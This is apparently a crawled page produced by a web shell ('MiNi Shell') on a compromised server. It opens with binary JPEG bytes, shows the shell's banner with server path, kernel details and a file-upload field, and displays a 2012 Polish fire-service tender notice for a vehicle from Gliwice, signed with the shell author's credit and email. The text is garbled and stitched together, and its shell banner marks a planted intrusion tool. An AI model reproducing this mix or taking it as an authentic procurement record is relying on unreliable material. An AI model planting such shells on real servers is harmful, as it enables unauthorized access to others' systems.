JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121107/436292-N-2012.html

<p class="kh_header"><b>Gliwice: Zakup i dostawa samochodu uprzywilejowanego - do przewozu osób oraz sprzętu,  sorbentów i neutralizatorów dla Komendy Miejskiej Państwowej Straży Pożarnej w Gliwicach z przeznaczeniem dla Jednostki Ratowniczo-Gaśniczej PSP w Knurowie.</b><br>
<b>Numer ogłoszenia: 436292 - 2012; data zamieszczenia: 07.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Miejska Państwowej Straży Pożarnej w Gliwicach , ul. Wrocławska 1, 44-100 Gliwice, woj. śląskie, tel. 032 2311885 wew. 240, faks 032 2317623.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kmpsp.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa samochodu uprzywilejowanego - do przewozu osób oraz sprzętu,  sorbentów i neutralizatorów dla Komendy Miejskiej Państwowej Straży Pożarnej w Gliwicach z przeznaczeniem dla Jednostki Ratowniczo-Gaśniczej PSP w Knurowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakup i dostawa samochodu uprzywilejowanego  do przewozu osób oraz sprzętu,  sorbentów i neutralizatorów dla Komendy Miejskiej Państwowej Straży Pożarnej w Gliwicach z przeznaczeniem dla Jednostki Ratowniczo-Gaśniczej PSP w Knurowie.

2. Opis przedmiotu zamówienia:
a) postępowanie przetargowe obejmuje zakup i dostawę samochodu uprzywilejowanego pożarniczego do przewozu co najmniej 6-ciu osób oraz sprzętu,  sorbentów i neutralizatorów dla Komendy Miejskiej Państwowej Straży Pożarnej w Gliwicach z przeznaczeniem dla Jednostki Ratowniczo-Gaśniczej PSP w Knurowie o dopuszczalnej masie całkowitej do 3,5 t.
3. Szczegółowy opis przedmiotu zamówienia został określony w Załączniku 
    Nr 4 do  specyfikacji i stanowiącym  jej integralną część.
4.  Zamawiający nie dopuszcza składania ofert wariantowych, ani częściowych.

UWAGA !
OFERTY NIE UWZGLĘDNIAJĄCE W/W WARUNKÓW 
ZOSTANĄ ODRZUCONE JAKO SPRZECZNE Z SIWZ!!!
 
 ZAŁĄCZNIK Nr 4         MT - 2370.13.2012


SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA - WYMAGANIA
MINIMALNE DLA:
Samochodu uprzywilejowanego do przewozu osób oraz sprzętu,  sorbentów i neutralizatorów dla Komendy Miejskiej Państwowej Straży Pożarnej w Gliwicach z przeznaczeniem dla Jednostki Ratowniczo-Gaśniczej PSP w Knurowie.

1.	Pojazd musi spełniać wymagania narzucone przepisami ustawy z dnia 20 czerwca 1997 Prawo o ruchu drogowym (Dz. U z 2005, nr 108, poz. 908 z późniejszymi zmianami).
2.	Zmiany adaptacyjne pojazdu dotyczące montażu wyposażenia nie mogą powodować utraty ani ograniczenia uprawnień wynikających z fabrycznej gwarancji mechanicznej.
3.	Urządzenia elektroniczne muszą spełniać wymagania normy PN-S-76020 Pojazdy drogowe. Urządzenia elektroniczne pojazdów samochodowych. Ogólne wymagania i metody badań lub równoważnych norm europejskich.
4.	Instalacja elektryczna pojazdu musi spełniać wymagania normy PN-S-76021 Instalacja elektryczna pojazdów samochodowych. Wymagania i metody badań lub równoważnych norm europejskich.
5.	Pojazd musi spełniać wymagania narzucone przepisami Zarządzenia Nr 8 Komendanta Głównego Państwowej Straży Pożarnej z 10 kwietnia 2008 r. w sprawie gospodarki transportowej w jednostkach organizacyjnych Państwowej Straży Pożarnej .(Dz. Urz. KG PSP z 2008 r, nr 1 poz. 8)
6.	Stawka podatku VAT 8% zgodnie z zał. nr 3 poz. 129 pkt 1, ustawy z dnia 11 marca 2004 roku o podatku od towarów i usług, dla jednostek ochrony przeciwpożarowej, przeznaczonych na cele ochrony przeciwpożarowej. Jeżeli są spełnione wskazane  tamże 	warunki.	
7.	Pojazd musi być nadto wyposażony w urządzenia sygnalizacyjno - ostrzegawcze przewidziane dla pojazdu uprzywilejowanego, z zamontowanym radiotelefonem Motorola GM 360, min. 200 kanałów wraz z instalacją antenową.

W celu spełnienia wymagań przez Dostawcę, prawą stronę tabeli należy wypełnić wpisując słowo spełnia lub parametry wyższe w przypadku, gdy Dostawca proponuje coś więcej niż chce Zamawiający w swoich minimalnych wymaganiach.



Wymagania minimalne zamawiającego

1	Pojazd fabrycznie nowy rok produkcji 2012.	
2	Typ nadwozia:  skrzyniowy, samowyładowczy jednostronny, z kabiną 6-cio lub  
        7-mio osobową. 
3	 Kolor  samochodu czerwony lub biały .,przedni zderzak w kolorze białym.	
4	Silnik: o poj od 1950 - do 2550 cm3, rzędowy, wysokoprężny z bezpośrednim 
        wtryskiem turbodoładowany z chłodnicą pośrednią (intercoolerem)	
5	Liczba cylindrów: min. 4	
6	Moc: min 120 KM	
7	Skrzynia biegów: manualna, min. 6-cio biegowa	
8	Ilość miejsc: 6  lub 7  osób	
9	Przednie hamulce tarczowe 	
10	Bezpieczna kolumna kierownicy	
11	Wzmocnienie drzwi przednich i tylnych 	
12	Dodatkowe światło STOP	
13	Centralny zamek sterowany pilotem	
14	3-punktowe pasy bezpieczeństwa przednich siedzeń	
15	Napinacze i ograniczniki siły przednich pasów bezpieczeństwa	
16	Tylne pasy bezpieczeństwa	
17	Minimum dwie poduszki powietrzne	
18	Antyblokujący układ hamulcowy ABS z rozdziałem siły hamowania	
19	Dodatkowy komplet opon zimowych	
20	Elektrycznie sterowane i podgrzewane lusterka boczne	
21	Przednie wycieraczki z funkcją pracy okresowej	
22	Radio CD/MP3	
23	Antena	
24	Zbiornik paliwa min. 100 l.	
25	Moment obrotowy silnika: min 300 Nm	
26	Pojazd wyposażony w  urządzenia sygnalizacyjno-ostrzegawcze, akustyczne i 
        świetlne pojazdu uprzywilejowanego na dachu (belka świetlna -Lampa ledowa) 
         - dwa światła ledowe  w kolorze niebieskim  z przodu pojazdu w okolicach 
        grilla silnikowego.
        Pojazd oznakowany przez oklejenie zgodne z zarz. Nr 8 KG PSP treść   
        załącznik nr 4 pkt. 5	
27	W kabinie pojazdu zamontowany radiootelefon Motorola GM360
        Min 200 kanałów wraz instalacją antenową 	
28	Samochód musi spełniać 5 normę europejskiego standardu emisji spalin             
        (Dyrektywa 2007/715/EC[13])	
29	Wymiary przestrzeni ładunkowej:
        długość całkowita min. 2500 mm
        wysokość od podłoża do burty max. 1100
        skrzynia ładunkowa fabryczna nie wykluczająca warunków gwarancyjnych 
        i wyposażona w plandekę zabezpieczającą.
        Minimalna masa ładunku 750 kg.	
30	Oświetlenie wnętrza	
31	Tapicerka materiałowa (nie może być ze skóry ekologicznej lub 
        skóry   naturalnej),	
32	Klimatyzacja 	
33	Długość całkowita pojazdu: min 5000 mm  max 7000 mm wysokość z belką 
        świetlną max 2700 mm	
34	Skrzynia ładunkowa wykonana  z aluminium umożliwiająca wywrot    
        jednostronny. Sterownik  systemu wyładowczego
        umiejscowiony w kabinie , nie narażony na warunki atmosferyczne) 	
35	Hak holowniczy przykręcany  (Eurohak)	
36	Czujniki cofania	
37	trójkąt ostrzegawczy	
38	Podnośnik	
39	Gaśnica 	
40	Urządzenie  do ogrzewania postojowego	
41	Apteczka samochodowa wyposażona w minimum:
min. 3 szt.  	Kompres 10 x 10 cm sterylny
min. 2 szt.  	Opaska elastyczna 4m x 6cm
min. 3 szt.  	Opaska elastyczna 4m x 8cm
min. 1 kpl.  	        Plaster 10 x 6 cm (8szt.)
min. 1 szt.  	Plaster 5m x 2,5 cm
min. 3 szt.   	Opatrunek indywidualny M sterylny
min. 1 szt.   	Opatrunek indywidualny G sterylny
min. 2 szt.   	Chusta opatrunkowa 40 x 60 sterylna
min. 1 szt.   	Chusta opatrunkowa 60 x 80 sterylna
min. 2 szt.   	Chusta trójkątna
min. 10 szt. 	Koc ratunkowy 160 x 210cm 
min. 1 szt.   	Nożyczki 14,5 cm
min. 4 szt.   	Rękawice lateksowe lub winylowe
min. 1 szt.   	Maseczka do sztucznego oddychania
min. 1szt.   	Specjalny nóż do cięcia pasów bezpieczeństwa o konstrukcji           uniemożliwiającej skaleczenie, pomagający uwolnić ofiarę wypadku 
                         z wraku samochodu i w razie konieczności przeciąć ubranie
min. 1szt.    	
                         Instrukcja obsługi wyposażenia oraz informacja o dacie ważności  
                        materiałów jałowych	
42	Dywaniki gumowe przy przednich i tylnych siedzeniach,	
43	Pojazd nie może być uszkodzony ani powypadkowy lub po kolizji - naprawiany.  
        Pojazd musi być w pełni sprawny	
44	Do samochodu należy dołączyć: kartę pojazdu, instrukcję obsługi w języku   
        polskim, książkę gwarancyjną w języku polskim oraz kartę kodową klucza z   
        immobilizerem, a także spis autoryzowanych stacji obsługi na terenie RP,  
        uprawnionych do dokonywania napraw gwarancyjnych.
Dane z świadectwa homologacji
zużycie energii 
emisja dwutlenku węgla 
emisja tlenków azotu 
emisja węglowodorów 
emisja cząstek stałych 	
* - właściwe skreślić

W celu spełnienia wymagań przez Dostawcę, prawą stronę tabeli należy wypełnić wpisując słowo spełnia lub parametry wyższe w przypadku, gdy Dostawca proponuje coś więcej niż chce Zamawiający w swoich minimalnych wymaganiach.

 Pominięcie  (niewypełnienie)  jakiejkolwiek pozycji wymagań minimalnych lub podanie danych poniżej wskazanych-spowoduje odrzucenie oferty jako sprzecznej z SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.11.40.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium  w wysokości  - 3000,00 zł.

Art. 45 Ustawy z 29.01.2004 r. Prawo zamówień publicznych:
     Art. 45. 1. Zamawiający żąda od wykonawców wniesienia wadium, jeżeli wartość zamówienia jest równa lub przekracza kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8.
2. Jeżeli wartość zamówienia jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8, zamawiający może żądać od wykonawców wniesienia wadium.
3. Wadium wnosi się przed upływem terminu składania ofert.
4. Zamawiający określa kwotę wadium w wysokości nie większej niż 3 % wartości zamówienia.
5. Jeżeli zamawiający dopuszcza składanie ofert częściowych lub udziela zamówienia w częściach, określa kwotę wadium dla każdej z części. Przepis ust. 4 stosuje się odpowiednio.
5a. Jeżeli zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub art. 134 ust. 6 pkt 3 i 4, określa kwotę wadium dla wartości zamówienia podstawowego. Przepis ust. 4 stosuje się odpowiednio.
6. Wadium może być wnoszone w jednej lub kilku następujących formach:
	1)	pieniądzu;
	2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	3)	gwarancjach bankowych;
	4)	gwarancjach ubezpieczeniowych;
	5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
7. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego.
8. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.

		Do oferty należy bezwzględnie dołączyć dokument potwierdzający wniesienie wadium.
     Nr rachunku bankowego, na który należy wpłacić wadium.
	ING Bank Śląski oddział Gliwice
12 1050 1285 1000 0022 7805 9502</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Dostawcy spełniający warunki określone w art. 22 ust. 1 pkt. 1 - 4 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (Dz. U. z 2010 Nr 113, poz. 759 ze zm.), nie podlegający wykluczeniu z postępowania o udzielenie zamówienia publicznego stosownie do art. 24 ust 1 - 2 ustawy oraz spełniają warunki określone w SIWZ. Ocenę spełnienia tych warunków Zamawiający dokona poprzez analizę formalną i merytoryczną dokumentów i oświadczeń złożonych przez Dostawcę metodą:               spełnia  /  nie spełnia.

a także 

kryteriów oceny ofert w zakresie ceny ( 85 % ) oraz dodatkowych kryteriów i ich znaczenie wg Rozporządzenia Prezesa Rady Ministrów z dnia 10 maja 2011 r. w sprawie innych niż cena obowiązkowych kryteriów oceny ofert  w odniesieniu do niektórych rodzajów zamówień publicznych i tak 
a). zużycie energii - 3%,
b). emisja dwutlenku węgla - 3%
c). emisja tlenków azotu - 3%,
d). emisja węglowodorów - 3%,
e). emisja cząstek stałych - 3%.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą się ubiegać dostawcy, którzy wcześniej prawidłowo zrealizowali tego typu dostawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą się ubiegać dostawcy, których potencjał techniczny pozwoli na prawidłową realizację zakupu i dostawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą się ubiegać dostawcy, którzy dysponują lub będą dysponować osobami i potencjałem technicznym pozwalającym zrealizować dostawę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą się ubiegać dostawcy, których sytuacja ekonomiczna i finansowa  pozwoli zrealizować prawidłowo dostawę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 85.00</li>
<li>2 - Zużycie energii - 3.00</li>
<li>3 - emisja dwutlenku węgla - 3.00</li>
<li>4 - Emisja tlenków azotu - 3.00</li>
<li>5 - Emisja węglowodorów - 3.00</li>
<li>6 - Emisja cząstek stałych - 3.00</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kmpsp.gliwice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Miejska
Państwowej Straży Pożarnej
ul. Wrocławska 1
44 - 100 Gliwice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2012 godzina 10:00, miejsce: Komenda Miejska
Państwowej Straży Pożarnej
ul. Wrocławska 1
44 - 100 Gliwice
pok. nr 6 - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com